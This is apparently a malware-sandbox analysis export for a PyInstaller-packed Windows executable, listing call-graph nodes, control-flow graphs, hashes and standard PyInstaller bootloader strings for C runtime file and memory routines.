7ff7f250c93e HeapAlloc 16313 7ff7f250c955 16311->16313 16311->16314 16312->16313 16313->16271 16313->16274 16314->16310 16314->16311 16315 7ff7f25128a0 memcpy_s 2 API calls 16314->16315 16315->16314 16317 7ff7f25112d4 47 API calls 16316->16317 16318 7ff7f25119a9 16317->16318 16319 7ff7f2511aff 16318->16319 16321 7ff7f25119e6 IsValidCodePage 16318->16321 16326 7ff7f2511a00 memcpy_s 16318->16326 16320 7ff7f24fb870 _log10_special 8 API calls 16319->16320 16323 7ff7f2511741 16320->16323 16321->16319 16322 7ff7f25119f7 16321->16322 16324 7ff7f2511a26 GetCPInfo 16322->16324 16322->16326 16323->16277 16323->16281 16324->16319 16324->16326 16375 7ff7f25113ec 16326->16375 16462 7ff7f250f5e8 EnterCriticalSection 16327->16462 16344 7ff7f250419c 16343->16344 16350 7ff7f2504197 16343->16350 16345 7ff7f250a460 __GetCurrentState 45 API calls 16344->16345 16344->16350 16346 7ff7f25041b7 16345->16346 16351 7ff7f250cc94 16346->16351 16350->16305 16350->16306 16352 7ff7f250cca9 16351->16352 16354 7ff7f25041da 16351->16354 16352->16354 16359 7ff7f2512614 16352->16359 16355 7ff7f250cd00 16354->16355 16356 7ff7f250cd28 16355->16356 16357 7ff7f250cd15 16355->16357 16356->16350 16357->16356 16372 7ff7f2511960 16357->16372 16360 7ff7f250a460 __GetCurrentState 45 API calls 16359->16360 16361 7ff7f2512623 16360->16361 16362 7ff7f251266e 16361->16362 16371 7ff7f250f5e8 EnterCriticalSection 16361->16371 16362->16354 16373 7ff7f250a460 __GetCurrentState 45 API calls 16372->16373 16374 7ff7f2511969 16373->16374 16376 7ff7f2511429 GetCPInfo 16375->16376 16385 7ff7f251151f 16375->16385 16381 7ff7f251143c 16376->16381 16376->16385 16377 7ff7f24fb870 _log10_special 8 API calls 16379 7ff7f25115be 16377->16379 16379->16319 16386 7ff7f2512150 16381->16386 16385->16377 16387 7ff7f2504178 45 API calls 16386->16387 16388 7ff7f2512192 16387->16388 16406 7ff7f250ebb0 16388->16406 16408 7ff7f250ebb9 MultiByteToWideChar 16406->16408 16464 7ff7f2508661 16463->16464 16465 7ff7f25087c5 16463->16465 16464->16240 16466 7ff7f25087ee 16465->16466 16467 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16465->16467 16468 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16466->16468 16467->16465 16468->16464 16470 7ff7f25155e8 16469->16470 16471 7ff7f25155d1 16469->16471 16470->16471 16473 7ff7f25155f6 16470->16473 16472 7ff7f25043f4 memcpy_s 11 API calls 16471->16472 16474 7ff7f25155d6 16472->16474 16476 7ff7f2504178 45 API calls 16473->16476 16477 7ff7f25155e1 16473->16477 16475 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 16474->16475 16475->16477 16476->16477 16477->15969 16479 7ff7f2504178 45 API calls 16478->16479 16480 7ff7f2518281 16479->16480 16483 7ff7f2517ed8 16480->16483 16487 7ff7f2517f26 16483->16487 16484 7ff7f24fb870 _log10_special 8 API calls 16485 7ff7f2516515 16484->16485 16485->15969 16485->15971 16486 7ff7f2517fad 16488 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 16486->16488 16492 7ff7f2517fb1 16486->16492 16487->16486 16489 7ff7f2517f98 GetCPInfo 16487->16489 16487->16492 16490 7ff7f2518045 16488->16490 16489->16486 16489->16492 16491 7ff7f250c90c _fread_nolock 12 API calls 16490->16491 16490->16492 16493 7ff7f251807c 16490->16493 16491->16493 16492->16484 16493->16492 16494 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 16493->16494 16495 7ff7f25180ea 16494->16495 16496 7ff7f25181cc 16495->16496 16497 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 16495->16497 16496->16492 16498 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16496->16498 16499 7ff7f2518110 16497->16499 16498->16492 16499->16496 16500 7ff7f250c90c _fread_nolock 12 API calls 16499->16500 16501 7ff7f251813d 16499->16501 16500->16501 16501->16496 16502 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 16501->16502 16503 7ff7f25181b4 16502->16503 16504 7ff7f25181ba 16503->16504 16505 7ff7f25181d4 16503->16505 16504->16496 16508 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16504->16508 16512 7ff7f250e278 16505->16512 16508->16496 16509 7ff7f2518213 16509->16492 16511 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16509->16511 16510 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16510->16509 16511->16492 16513 7ff7f250e020 __crtLCMapStringW 5 API calls 16512->16513 16514 7ff7f250e2b6 16513->16514 16515 7ff7f250e4e0 __crtLCMapStringW 5 API calls 16514->16515 16516 7ff7f250e2be 16514->16516 16517 7ff7f250e327 CompareStringW 16515->16517 16516->16509 16516->16510 16517->16516 16519 7ff7f2516f99 16518->16519 16520 7ff7f2516fa3 16518->16520 16521 7ff7f250c90c _fread_nolock 12 API calls 16519->16521 16522 7ff7f2516fa8 16520->16522 16528 7ff7f2516faf memcpy_s 16520->16528 16526 7ff7f2516fa1 16521->16526 16523 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16522->16523 16523->16526 16524 7ff7f2516fe2 RtlReAllocateHeap 16524->16526 16524->16528 16525 7ff7f2516fb5 16527 7ff7f25043f4 memcpy_s 11 API calls 16525->16527 16526->15980 16527->16526 16528->16524 16528->16525 16529 7ff7f25128a0 memcpy_s 2 API calls 16528->16529 16529->16528 16531 7ff7f2516f6a HeapSize 16530->16531 16532 7ff7f2516f51 16530->16532 16533 7ff7f25043f4 memcpy_s 11 API calls 16532->16533 16534 7ff7f2516f56 16533->16534 16535 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 16534->16535 16536 7ff7f2516f61 16535->16536 16536->15975 16538 7ff7f250e020 __crtLCMapStringW 5 API calls 16537->16538 16539 7ff7f250e254 16538->16539 16539->15985 16541 7ff7f25047e6 16540->16541 16542 7ff7f250480a 16540->16542 16546 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16541->16546 16549 7ff7f25047f5 16541->16549 16543 7ff7f2504864 16542->16543 16544 7ff7f250480f 16542->16544 16545 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 16543->16545 16547 7ff7f2504824 16544->16547 16544->16549 16550 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16544->16550 16555 7ff7f2504880 16545->16555 16546->16549 16551 7ff7f250c90c _fread_nolock 12 API calls 16547->16551 16548 7ff7f2504887 GetLastError 16562 7ff7f2504368 16548->16562 16549->15988 16549->15989 16550->16547 16551->16549 16553 7ff7f25048c2 16553->16549 16557 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 16553->16557 16555->16548 16555->16553 16556 7ff7f25048b5 16555->16556 16559 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16555->16559 16560 7ff7f250c90c _fread_nolock 12 API calls 16556->16560 16561 7ff7f2504906 16557->16561 16558 7ff7f25043f4 memcpy_s 11 API calls 16558->16549 16559->16556 16560->16553 16561->16548 16561->16549 16563 7ff7f250a5d8 memcpy_s 11 API calls 16562->16563 16564 7ff7f2504375 Concurrency::details::SchedulerProxy::DeleteThis 16563->16564 16565 7ff7f250a5d8 memcpy_s 11 API calls 16564->16565 16566 7ff7f2504397 16565->16566 16566->16558 19338 7ff7f2509060 19341 7ff7f2508fe4 19338->19341 19348 7ff7f250f5e8 EnterCriticalSection 19341->19348 19668 7ff7f250a2e0 19669 7ff7f250a2e5 19668->19669 19673 7ff7f250a2fa 19668->19673 19674 7ff7f250a300 19669->19674 19675 7ff7f250a34a 19674->19675 19676 7ff7f250a342 19674->19676 19678 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19675->19678 19677 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19676->19677 19677->19675 19679 7ff7f250a357 19678->19679 19680 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19679->19680 19681 7ff7f250a364 19680->19681 19682 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19681->19682 19683 7ff7f250a371 19682->19683 19684 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19683->19684 19685 7ff7f250a37e 19684->19685 19686 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19685->19686 19687 7ff7f250a38b 19686->19687 19688 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19687->19688 19689 7ff7f250a398 19688->19689 19690 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19689->19690 19691 7ff7f250a3a5 19690->19691 19692 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19691->19692 19693 7ff7f250a3b5 19692->19693 19694 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19693->19694 19695 7ff7f250a3c5 19694->19695 19700 7ff7f250a1a4 19695->19700 19714 7ff7f250f5e8 EnterCriticalSection 19700->19714 16584 7ff7f24fae00 16585 7ff7f24fae2e 16584->16585 16586 7ff7f24fae15 16584->16586 16586->16585 16588 7ff7f250c90c 12 API calls 16586->16588 16587 7ff7f24fae8e 16588->16587 19793 7ff7f2519ef3 19795 7ff7f2519f03 19793->19795 19797 7ff7f2504788 LeaveCriticalSection 19795->19797 19798 7ff7f25109c0 19809 7ff7f25166f4 19798->19809 19810 7ff7f2516701 19809->19810 19811 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19810->19811 19812 7ff7f251671d 19810->19812 19811->19810 19813 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19812->19813 19814 7ff7f25109c9 19812->19814 19813->19812 19815 7ff7f250f5e8 EnterCriticalSection 19814->19815 19482 7ff7f2504720 19483 7ff7f250472b 19482->19483 19491 7ff7f250e5b4 19483->19491 19504 7ff7f250f5e8 EnterCriticalSection 19491->19504 20074 7ff7f250ec9c 20075 7ff7f250ee8e 20074->20075 20077 7ff7f250ecde _isindst 20074->20077 20076 7ff7f25043f4 memcpy_s 11 API calls 20075->20076 20094 7ff7f250ee7e 20076->20094 20077->20075 20080 7ff7f250ed5e _isindst 20077->20080 20078 7ff7f24fb870 _log10_special 8 API calls 20079 7ff7f250eea9 20078->20079 20095 7ff7f25154a4 20080->20095 20085 7ff7f250eeba 20087 7ff7f2509c10 _isindst 17 API calls 20085->20087 20089 7ff7f250eece 20087->20089 20092 7ff7f250edbb 20092->20094 20120 7ff7f25154e8 20092->20120 20094->20078 20096 7ff7f250ed7c 20095->20096 20097 7ff7f25154b3 20095->20097 20102 7ff7f25148a8 20096->20102 20127 7ff7f250f5e8 EnterCriticalSection 20097->20127 20103 7ff7f25148b1 20102->20103 20107 7ff7f250ed91 20102->20107 20104 7ff7f25043f4 memcpy_s 11 API calls 20103->20104 20105 7ff7f25148b6 20104->20105 20106 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 20105->20106 20106->20107 20107->20085 20108 7ff7f25148d8 20107->20108 20109 7ff7f250eda2 20108->20109 20110 7ff7f25148e1 20108->20110 20109->20085 20114 7ff7f2514908 20109->20114 20111 7ff7f25043f4 memcpy_s 11 API calls 20110->20111 20112 7ff7f25148e6 20111->20112 20113 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 20112->20113 20113->20109 20115 7ff7f250edb3 20114->20115 20116 7ff7f2514911 20114->20116 20115->20085 20115->20092 20117 7ff7f25043f4 memcpy_s 11 API calls 20116->20117 20118 7ff7f2514916 20117->20118 20119 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 20118->20119 20119->20115 20128 7ff7f250f5e8 EnterCriticalSection 20120->20128 19569 7ff7f250b830 19580 7ff7f250f5e8 EnterCriticalSection 19569->19580 19025 7ff7f2504938 19026 7ff7f2504952 19025->19026 19027 7ff7f250496f 19025->19027 19028 7ff7f25043d4 _fread_nolock 11 API calls 19026->19028 19027->19026 19029 7ff7f2504982 CreateFileW 19027->19029 19030 7ff7f2504957 19028->19030 19031 7ff7f25049b6 19029->19031 19032 7ff7f25049ec 19029->19032 19034 7ff7f25043f4 memcpy_s 11 API calls 19030->19034 19050 7ff7f2504a8c GetFileType 19031->19050 19076 7ff7f2504f14 19032->19076 19037 7ff7f250495f 19034->19037 19041 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 19037->19041 19039 7ff7f25049f5 19044 7ff7f2504368 _fread_nolock 11 API calls 19039->19044 19040 7ff7f2504a20 19097 7ff7f2504cd4 19040->19097 19046 7ff7f250496a 19041->19046 19042 7ff7f25049e1 CloseHandle 19042->19046 19043 7ff7f25049cb CloseHandle 19043->19046 19049 7ff7f25049ff 19044->19049 19049->19046 19051 7ff7f2504ada 19050->19051 19052 7ff7f2504b97 19050->19052 19053 7ff7f2504b06 GetFileInformationByHandle 19051->19053 19056 7ff7f2504e10 21 API calls 19051->19056 19054 7ff7f2504bc1 19052->19054 19055 7ff7f2504b9f 19052->19055 19057 7ff7f2504bb2 GetLastError 19053->19057 19058 7ff7f2504b2f 19053->19058 19060 7ff7f2504be4 PeekNamedPipe 19054->19060 19075 7ff7f2504b82 19054->19075 19055->19057 19059 7ff7f2504ba3 19055->19059 19061 7ff7f2504af4 19056->19061 19064 7ff7f2504368 _fread_nolock 11 API calls 19057->19064 19062 7ff7f2504cd4 51 API calls 19058->19062 19063 7ff7f25043f4 memcpy_s 11 API calls 19059->19063 19060->19075 19061->19053 19061->19075 19066 7ff7f2504b3a 19062->19066 19063->19075 19064->19075 19065 7ff7f24fb870 _log10_special 8 API calls 19067 7ff7f25049c4 19065->19067 19114 7ff7f2504c34 19066->19114 19067->19042 19067->19043 19070 7ff7f2504c34 10 API calls 19071 7ff7f2504b59 19070->19071 19072 7ff7f2504c34 10 API calls 19071->19072 19073 7ff7f2504b6a 19072->19073 19074 7ff7f25043f4 memcpy_s 11 API calls 19073->19074 19073->19075 19074->19075 19075->19065 19077 7ff7f2504f4a 19076->19077 19078 7ff7f2504fe2 __vcrt_freefls 19077->19078 19079 7ff7f25043f4 memcpy_s 11 API calls 19077->19079 19080 7ff7f24fb870 _log10_special 8 API calls 19078->19080 19081 7ff7f2504f5c 19079->19081 19082 7ff7f25049f1 19080->19082 19083 7ff7f25043f4 memcpy_s 11 API calls 19081->19083 19082->19039 19082->19040 19084 7ff7f2504f64 19083->19084 19085 7ff7f2507118 45 API calls 19084->19085 19086 7ff7f2504f79 19085->19086 19087 7ff7f2504f81 19086->19087 19088 7ff7f2504f8b 19086->19088 19089 7ff7f25043f4 memcpy_s 11 API calls 19087->19089 19090 7ff7f25043f4 memcpy_s 11 API calls 19088->19090 19094 7ff7f2504f86 19089->19094 19091 7ff7f2504f90 19090->19091 19091->19078 19092 7ff7f25043f4 memcpy_s 11 API calls 19091->19092 19093 7ff7f2504f9a 19092->19093 19095 7ff7f2507118 45 API calls 19093->19095 19094->19078 19096 7ff7f2504fd4 GetDriveTypeW 19094->19096 19095->19094 19096->19078 19099 7ff7f2504cfc 19097->19099 19098 7ff7f2504a2d 19107 7ff7f2504e10 19098->19107 19099->19098 19121 7ff7f250ea34 19099->19121 19101 7ff7f2504d90 19101->19098 19102 7ff7f250ea34 51 API calls 19101->19102 19103 7ff7f2504da3 19102->19103 19103->19098 19104 7ff7f250ea34 51 API calls 19103->19104 19105 7ff7f2504db6 19104->19105 19105->19098 19106 7ff7f250ea34 51 API calls 19105->19106 19106->19098 19108 7ff7f2504e2a 19107->19108 19109 7ff7f2504e61 19108->19109 19110 7ff7f2504e3a 19108->19110 19112 7ff7f250e8c8 21 API calls 19109->19112 19111 7ff7f2504e4a 19110->19111 19113 7ff7f2504368 _fread_nolock 11 API calls 19110->19113 19111->19049 19112->19111 19113->19111 19115 7ff7f2504c50 19114->19115 19116 7ff7f2504c5d FileTimeToSystemTime 19114->19116 19115->19116 19118 7ff7f2504c58 19115->19118 19117 7ff7f2504c71 SystemTimeToTzSpecificLocalTime 19116->19117 19116->19118 19117->19118 19119 7ff7f24fb870 _log10_special 8 API calls 19118->19119 19120 7ff7f2504b49 19119->19120 19120->19070 19122 7ff7f250ea65 19121->19122 19123 7ff7f250ea41 19121->19123 19126 7ff7f250ea9f 19122->19126 19129 7ff7f250eabe 19122->19129 19123->19122 19124 7ff7f250ea46 19123->19124 19125 7ff7f25043f4 memcpy_s 11 API calls 19124->19125 19127 7ff7f250ea4b 19125->19127 19128 7ff7f25043f4 memcpy_s 11 API calls 19126->19128 19131 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 19127->19131 19132 7ff7f250eaa4 19128->19132 19130 7ff7f2504178 45 API calls 19129->19130 19137 7ff7f250eacb 19130->19137 19133 7ff7f250ea56 19131->19133 19134 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 19132->19134 19133->19101 19135 7ff7f250eaaf 19134->19135 19135->19101 19136 7ff7f250f7ec 51 API calls 19136->19137 19137->19135 19137->19136

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF7F24F1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 0 7ff7f24f1000-7ff7f24f3536 call 7ff7f24ff138 call 7ff7f24ff140 call 7ff7f24fbb70 call 7ff7f2504700 call 7ff7f2504794 call 7ff7f24f33e0 14 7ff7f24f3544-7ff7f24f3566 call 7ff7f24f18f0 0->14 15 7ff7f24f3538-7ff7f24f353f 0->15 20 7ff7f24f3736-7ff7f24f374c call 7ff7f24f3f70 14->20 21 7ff7f24f356c-7ff7f24f3583 call 7ff7f24f1bf0 14->21 16 7ff7f24f371a-7ff7f24f3735 call 7ff7f24fb870 15->16 29 7ff7f24f3785-7ff7f24f379a call 7ff7f24f25f0 20->29 30 7ff7f24f374e-7ff7f24f377b call 7ff7f24f76a0 20->30 25 7ff7f24f3588-7ff7f24f35c1 21->25 27 7ff7f24f3653-7ff7f24f366d call 7ff7f24f7e10 25->27 28 7ff7f24f35c7-7ff7f24f35cb 25->28 44 7ff7f24f3695-7ff7f24f369c 27->44 45 7ff7f24f366f-7ff7f24f3675 27->45 33 7ff7f24f35cd-7ff7f24f35e5 call 7ff7f2504560 28->33 34 7ff7f24f3638-7ff7f24f364d call 7ff7f24f18e0 28->34 47 7ff7f24f3712 29->47 41 7ff7f24f379f-7ff7f24f37be call 7ff7f24f1bf0 30->41 42 7ff7f24f377d-7ff7f24f3780 call 7ff7f24ff36c 30->42 52 7ff7f24f35f2-7ff7f24f360a call 7ff7f2504560 33->52 53 7ff7f24f35e7-7ff7f24f35eb 33->53 34->27 34->28 62 7ff7f24f37c1-7ff7f24f37ca 41->62 42->29 54 7ff7f24f3844-7ff7f24f3863 call 7ff7f24f3e90 44->54 55 7ff7f24f36a2-7ff7f24f36c0 call 7ff7f24f7e10 call 7ff7f24f7f80 44->55 50 7ff7f24f3682-7ff7f24f3690 call 7ff7f250415c 45->50 51 7ff7f24f3677-7ff7f24f3680 45->51 47->16 50->44 51->50 68 7ff7f24f360c-7ff7f24f3610 52->68 69 7ff7f24f3617-7ff7f24f362f call 7ff7f2504560 52->69 53->52 65 7ff7f24f3865-7ff7f24f386f call 7ff7f24f3fe0 54->65 66 7ff7f24f3871-7ff7f24f3882 call 7ff7f24f1bf0 54->66 76 7ff7f24f36c6-7ff7f24f36c9 55->76 77 7ff7f24f380f-7ff7f24f381e call 7ff7f24f8400 55->77 62->62 67 7ff7f24f37cc-7ff7f24f37e9 call 7ff7f24f18f0 62->67 79 7ff7f24f3887-7ff7f24f38a1 call 7ff7f24f86b0 65->79 66->79 67->25 86 7ff7f24f37ef-7ff7f24f3800 call 7ff7f24f25f0 67->86 68->69 69->34 82 7ff7f24f3631 69->82 76->77 83 7ff7f24f36cf-7ff7f24f36f6 call 7ff7f24f1bf0 76->83 93 7ff7f24f3820 77->93 94 7ff7f24f382c-7ff7f24f382f call 7ff7f24f7c40 77->94 95 7ff7f24f38a3 79->95 96 7ff7f24f38af-7ff7f24f38c1 SetDllDirectoryW 79->96 82->34 97 7ff7f24f3805-7ff7f24f380d call 7ff7f250415c 83->97 98 7ff7f24f36fc-7ff7f24f3703 call 7ff7f24f25f0 83->98 86->47 93->94 104 7ff7f24f3834-7ff7f24f3836 94->104 95->96 100 7ff7f24f38c3-7ff7f24f38ca 96->100 101 7ff7f24f38d0-7ff7f24f38ec call 7ff7f24f6560 call 7ff7f24f6b00 96->101 97->79 108 7ff7f24f3708-7ff7f24f370a 98->108 100->101 105 7ff7f24f3a50-7ff7f24f3a58 100->105 117 7ff7f24f38ee-7ff7f24f38f4 101->117 118 7ff7f24f3947-7ff7f24f394a call 7ff7f24f6510 101->118 104->79 111 7ff7f24f3838 104->111 109 7ff7f24f3a7d-7ff7f24f3aaf call 7ff7f24f33d0 call 7ff7f24f3080 call 7ff7f24f33a0 call 7ff7f24f6780 call 7ff7f24f6510 105->109 110 7ff7f24f3a5a-7ff7f24f3a77 PostMessageW GetMessageW 105->110 108->47 110->109 111->54 120 7ff7f24f38f6-7ff7f24f3903 call 7ff7f24f65a0 117->120 121 7ff7f24f390e-7ff7f24f3918 call 7ff7f24f6970 117->121 125 7ff7f24f394f-7ff7f24f3956 118->125 120->121 133 7ff7f24f3905-7ff7f24f390c 120->133 135 7ff7f24f3923-7ff7f24f3931 call 7ff7f24f6cd0 121->135 136 7ff7f24f391a-7ff7f24f3921 121->136 125->105 130 7ff7f24f395c-7ff7f24f3966 call 7ff7f24f30e0 125->130 130->108 143 7ff7f24f396c-7ff7f24f3980 call 7ff7f24f83e0 130->143 138 7ff7f24f393a-7ff7f24f3942 call 7ff7f24f2870 call 7ff7f24f6780 133->138 135->125 148 7ff7f24f3933 135->148 136->138 138->118 151 7ff7f24f39a5-7ff7f24f39e1 call 7ff7f24f7f20 call 7ff7f24f7fc0 call 7ff7f24f6780 call 7ff7f24f6510 call 7ff7f24f7ec0 143->151 152 7ff7f24f3982-7ff7f24f399f PostMessageW GetMessageW 143->152 148->138 162 7ff7f24f39e6-7ff7f24f39e8 151->162 152->151 163 7ff7f24f3a3d-7ff7f24f3a4b call 7ff7f24f18a0 162->163 164 7ff7f24f39ea-7ff7f24f3a00 call 7ff7f24f81f0 call 7ff7f24f7ec0 162->164 163->108 164->163 171 7ff7f24f3a02-7ff7f24f3a10 164->171 172 7ff7f24f3a31-7ff7f24f3a38 call 7ff7f24f2870 171->172 173 7ff7f24f3a12-7ff7f24f3a2c call 7ff7f24f25f0 call 7ff7f24f18a0 171->173 172->163 173->108
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                        • API String ID: 514040917-585287483
                                                                                                                                                                                                                        • Opcode ID: 0a04b38bed04a14b463916ac8b6dd5067d5cff25c4ec1f8a055a289e318ab9ad
                                                                                                                                                                                                                        • Instruction ID: a4aa5a4a43c950fc3886f9cd66a523b6d8e780c56e05bab32feb431cce9da3dd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a04b38bed04a14b463916ac8b6dd5067d5cff25c4ec1f8a055a289e318ab9ad
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0F18F61B0868291FB19FB21D5542F9E691AFC4790FC44032DA3D476D6EFECE958C3A0
                                                                                                                                                                                                                        Function 00007FF7F2515C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 335 7ff7f2515c74-7ff7f2515ce7 call 7ff7f25159a8 338 7ff7f2515ce9-7ff7f2515cf2 call 7ff7f25043d4 335->338 339 7ff7f2515d01-7ff7f2515d0b call 7ff7f2507830 335->339 344 7ff7f2515cf5-7ff7f2515cfc call 7ff7f25043f4 338->344 345 7ff7f2515d0d-7ff7f2515d24 call 7ff7f25043d4 call 7ff7f25043f4 339->345 346 7ff7f2515d26-7ff7f2515d8f CreateFileW 339->346 359 7ff7f2516042-7ff7f2516062 344->359 345->344 349 7ff7f2515e0c-7ff7f2515e17 GetFileType 346->349 350 7ff7f2515d91-7ff7f2515d97 346->350 352 7ff7f2515e19-7ff7f2515e54 GetLastError call 7ff7f2504368 CloseHandle 349->352 353 7ff7f2515e6a-7ff7f2515e71 349->353 355 7ff7f2515dd9-7ff7f2515e07 GetLastError call 7ff7f2504368 350->355 356 7ff7f2515d99-7ff7f2515d9d 350->356 352->344 370 7ff7f2515e5a-7ff7f2515e65 call 7ff7f25043f4 352->370 362 7ff7f2515e79-7ff7f2515e7c 353->362 363 7ff7f2515e73-7ff7f2515e77 353->363 355->344 356->355 357 7ff7f2515d9f-7ff7f2515dd7 CreateFileW 356->357 357->349 357->355 367 7ff7f2515e82-7ff7f2515ed7 call 7ff7f2507748 362->367 368 7ff7f2515e7e 362->368 363->367 373 7ff7f2515ed9-7ff7f2515ee5 call 7ff7f2515bb0 367->373 374 7ff7f2515ef6-7ff7f2515f27 call 7ff7f2515728 367->374 368->367 370->344 373->374 380 7ff7f2515ee7 373->380 381 7ff7f2515f29-7ff7f2515f2b 374->381 382 7ff7f2515f2d-7ff7f2515f6f 374->382 383 7ff7f2515ee9-7ff7f2515ef1 call 7ff7f2509dd0 380->383 381->383 384 7ff7f2515f91-7ff7f2515f9c 382->384 385 7ff7f2515f71-7ff7f2515f75 382->385 383->359 386 7ff7f2516040 384->386 387 7ff7f2515fa2-7ff7f2515fa6 384->387 385->384 389 7ff7f2515f77-7ff7f2515f8c 385->389 386->359 387->386 390 7ff7f2515fac-7ff7f2515ff1 CloseHandle CreateFileW 387->390 389->384 392 7ff7f2515ff3-7ff7f2516021 GetLastError call 7ff7f2504368 call 7ff7f2507970 390->392 393 7ff7f2516026-7ff7f251603b 390->393 392->393 393->386
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                        • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                        • Instruction ID: 3cbf4503965cb128aa42080bdeb265713192ca82c54d0d19f36e789eefb09782
